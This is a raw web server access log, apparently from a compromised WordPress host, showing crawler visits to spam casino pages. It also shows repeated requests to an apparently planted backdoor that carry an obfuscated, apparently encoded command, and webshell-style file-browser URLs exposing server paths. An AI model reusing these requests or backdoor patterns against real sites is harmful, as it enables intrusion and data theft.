185.216.113.70 - - [01/May/2026:11:32:16 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632373933362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343333362q3065396161666661383335373231663666353039623561323835633066643236222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:34:24 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-id_ID.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 9539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.163 - - [01/May/2026:11:34:24 +0300] "GET /?detail/664377189 HTTP/1.1" 200 30018 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:34:29 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-da_DK.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 9655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
49.109.224.78 - - [01/May/2026:11:34:31 +0300] "GET /?detail/481221060 HTTP/2" 200 416 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Mobile Safari/537.36"
54.38.147.176 - - [01/May/2026:11:34:31 +0300] "GET /index.php?shop/regimentally/fulminatory063321297265.html HTTP/2" 200 8252 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.191.171.14 - - [01/May/2026:11:34:32 +0300] "GET /h1-a-comprehensive-breakdown-of-tronscan-s-features-h1/ HTTP/1.1" 200 10391 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:34:34 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia%2Fdocument.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:32:38 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632373935382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343335382q3564373930666436363366383665626336376234653764323866336664316633222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.1 - - [01/May/2026:11:34:38 +0300] "GET /?detail/484326008 HTTP/1.1" 200 29336 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:34:39 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net%2Ft%C3%BCrk%C3%A7e-slot-makinesi.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net HTTP/2" 200 4816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:34:44 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net%2Fk%C4%B1br%C4%B1s-slot-makinesi.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net HTTP/2" 200 4827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:34:49 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpXvNua8&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:34:55 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net%2Fyeni-slotlar-yaz%C4%B1l%C4%B1mlar%C4%B1.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net HTTP/2" 200 4850 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.89.129.172 - - [01/May/2026:11:34:55 +0300] "GET /index.php?shop/pythonism/tambourine00632473094.html HTTP/2" 200 8247 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:34:59 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia%2Fdefault.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia HTTP/2" 200 2843 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:33:00 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632373938302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343338302q3163396336383631336633663939343362353463336662663332393933383834222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:35:04 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2Fclassic-editor-1.6.7-ru_ru.zip&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.163 - - [01/May/2026:11:35:11 +0300] "GET /?detail/827429960 HTTP/1.1" 200 31039 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:35:16 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-sv_SE.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 9778 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.38.147.110 - - [01/May/2026:11:35:18 +0300] "GET /index.php?shop/purificatory/customable004256102349.html HTTP/2" 200 8265 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:35:20 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fcrystal%2Fspreadsheet.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fcrystal HTTP/2" 200 2851 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:33:22 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383030322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343430322q3065656232313938303361326632306561363664323634663866616339633237222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
185.191.171.7 - - [01/May/2026:11:35:23 +0300] "GET /como-jugar-al-888starz-casino/ HTTP/1.1" 200 10388 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [01/May/2026:11:35:23 +0300] "GET /?prizes/161618323 HTTP/1.1" 200 30220 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:35:25 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2Fhw-69c7e3e2084d0&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 27054 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:35:30 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fsfqzb%2FLICENSE.txt&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fsfqzb HTTP/2" 200 9900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.1 - - [01/May/2026:11:35:33 +0300] "GET /shop/sunsted/illume884007092971.html HTTP/1.1" 200 29381 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.81 - - [01/May/2026:11:35:35 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-zh_CN.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 10280 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:35:41 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia%2Fspreadsheet.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.168.17 - - [01/May/2026:11:35:42 +0300] "GET /index.php?shop/prink/differentia043623024981.html HTTP/2" 200 8256 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [01/May/2026:11:33:44 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383032342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343432342q3931343664336433363039643462343465313262313535363533663833386465222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:35:46 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke HTTP/2" 200 5386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.1 - - [01/May/2026:11:35:49 +0300] "GET /shop/monopolizer/strategist122424414536.html HTTP/1.1" 200 29699 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:35:51 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyone%2Freadme.txt&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyone HTTP/2" 200 4704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:35:56 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentytwo-nb_NO.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 11846 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:36:01 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-nl_NL.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 9613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:34:06 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383034362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343434362q3066316333306234346363303139633338653035316431643433353037643430222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
54.38.147.228 - - [01/May/2026:11:36:06 +0300] "GET /index.php?shop/postfurcae/inconsiderably043745512475.html HTTP/2" 200 8224 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:36:06 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FdbTemp.XjT9YX HTTP/2" 200 5091 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.2 - - [01/May/2026:11:36:13 +0300] "GET /?detail/750941856 HTTP/1.1" 200 29130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:36:22 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fsearch.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper HTTP/2" 200 3475 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.1 - - [01/May/2026:11:36:23 +0300] "GET /?detail/928883922 HTTP/1.1" 200 29206 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:36:27 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies%2Ficon_mad.gif&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies HTTP/2" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:34:28 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383036382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343436382q3762616333386536393135646132306563616638663130323830363331643365222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
51.195.183.162 - - [01/May/2026:11:36:29 +0300] "GET /index.php?shop/picquet/excreta05105569713.html HTTP/2" 200 8255 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:36:32 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia%2Farchive.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia HTTP/2" 200 2845 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:11:36:35 +0300] "GET /?detail/840763655 HTTP/1.1" 200 29042 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:36:37 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies%2Ficon_neutral.gif&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies HTTP/2" 200 2851 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:36:42 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fcrystal%2Fvideo.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fcrystal HTTP/2" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:36:47 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2F.tmb HTTP/2" 200 5087 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:34:50 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383039302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343439302q3739613064336333643762653865666336393030633565613134656666326434222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
54.38.147.193 - - [01/May/2026:11:36:53 +0300] "GET /index.php?shop/periergy/occupational051704303223.html HTTP/2" 200 8242 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:36:53 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke HTTP/2" 200 5386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:36:57 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Ffavicon.ico&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke HTTP/2" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:37:02 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-signup.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke HTTP/2" 200 13470 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:37:07 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Ffooter.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper HTTP/2" 200 3499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:35:12 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383131322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343531322q3439363830623638643937366563323761613431616337353039343563333266222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:37:12 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies%2Fsimple-smile.png&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fimages%2Fsmilies HTTP/2" 200 2850 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.226.117 - - [01/May/2026:11:37:16 +0300] "GET /index.php?shop/pardalotus/balky031228731979.html HTTP/2" 200 8238 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
